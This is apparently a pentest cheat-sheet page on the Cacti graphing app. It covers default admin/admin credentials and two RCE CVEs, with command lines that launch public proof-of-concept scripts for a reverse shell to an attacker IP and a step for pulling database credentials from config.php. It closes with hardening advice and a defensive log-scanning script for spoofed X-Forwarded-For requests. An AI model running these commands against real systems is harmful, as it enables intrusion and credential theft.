Cacti
PHP network-graphing app, usually on port 80. A long history of severe bugs: unauthenticated command injection (CVE-2022-46169) and authenticated graph-based RCE (CVE-2025-24367). The config file holds the DB creds.
Ports
| Port | Proto | Notes |
|---|---|---|
| 80 | tcp | Cacti web UI (often under /cacti) |
Fingerprint
- Login page shows 'Version 1.2.x', 'Cacti' branding
- Path /cacti/ or a cacti.* vhost
Key files
| Path | Holds | Sensitive |
|---|---|---|
| include/config.php | MySQL database name, user and password | yes |
Default / weak creds
admin / admin default on fresh installs
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2022-46169 | Unauthenticated command injection via remote_agent.php |
| CVE-2025-24367 | Authenticated RCE: writes arbitrary PHP via the graph-creation feature |
Exploitation primitives
- CVE-2022-46169: spoof X-Forwarded-For to a valid poller hostname and inject into the 'action=polldata' request to remote_agent.php for unauth RCE
- CVE-2025-24367: as any logged-in user, abuse graph creation to drop a PHP webshell in the web root
- Read include/config.php for the MySQL creds, then dig the user_auth table for hashes
Overview
Cacti is a PHP graphing front-end for RRDtool, usually on port 80. Always read the version off the login page: it maps straight to a known RCE.
Unauthenticated RCE (CVE-2022-46169)
Inject through remote_agent.php (needs a valid poller hostname in X-Forwarded-For):
python3 CVE-2022-46169.py -u http://<TARGET>/cacti --LHOST=<YOUR_IP> --LPORT=4444
Authenticated RCE (CVE-2025-24367)
With any low-priv login, the public PoC writes a PHP shell via graph creation:
python3 exploitcacti.py -u marcus -p wonderful1 -i <YOUR_IP> -l 4444 -url http://<TARGET>
Loot the DB creds
grep database_ include/config.php
Hardening
Patch to the latest 1.2.x, change admin/admin, restrict who can create graphs/templates, and lock down remote_agent.php to known pollers.
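To back up the last hardening point, here is an added detection example (not from the original page) that scans web-server access logs for remote_agent.php requests coming from outside the known poller range, or carrying an X-Forwarded-For that disagrees with the real source IP, which is the spoofing pattern the CVE-2022-46169 section describes. It assumes a custom LogFormat that appends the X-Forwarded-For header as a trailing quoted field, and the poller network 10.0.0.0/24 and all log lines are constructed.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlparse, parse_qs

# Constructed sample lines. Assumed format (custom LogFormat, not from the page):
#   client_ip - - [timestamp] "METHOD path HTTP/x" status bytes "X-Forwarded-For"
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1 HTTP/1.1" 200 512 "10.0.0.5"
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1 HTTP/1.1" 200 512 "10.0.0.5"
198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /cacti/index.php HTTP/1.1" 200 4096 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<xff>[^"]*)"$'
)

# Assumed: the only hosts that should legitimately talk to remote_agent.php.
KNOWN_POLLERS = [ip_network("10.0.0.0/24")]


def is_known_poller(ip: str) -> bool:
    """True if the address falls inside one of the allow-listed poller networks."""
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in KNOWN_POLLERS)


def find_suspicious(log_text: str):
    """Return (source_ip, xff, action, reasons) for suspect remote_agent.php hits."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines that do not match the format
        url = urlparse(m["path"])
        if not url.path.endswith("/remote_agent.php"):
            continue                      # only the poller endpoint is of interest
        action = parse_qs(url.query).get("action", [""])[0]
        reasons = []
        if not is_known_poller(m["ip"]):
            reasons.append("source is not a known poller")
        if m["xff"] not in ("", "-") and m["xff"] != m["ip"]:
            reasons.append("X-Forwarded-For differs from source (possible spoof)")
        if reasons:
            hits.append((m["ip"], m["xff"], action, reasons))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Run it against a real log only after confirming the LogFormat matches; if the proxy in front of Cacti rewrites X-Forwarded-For, compare against the proxy's own trusted-client field instead.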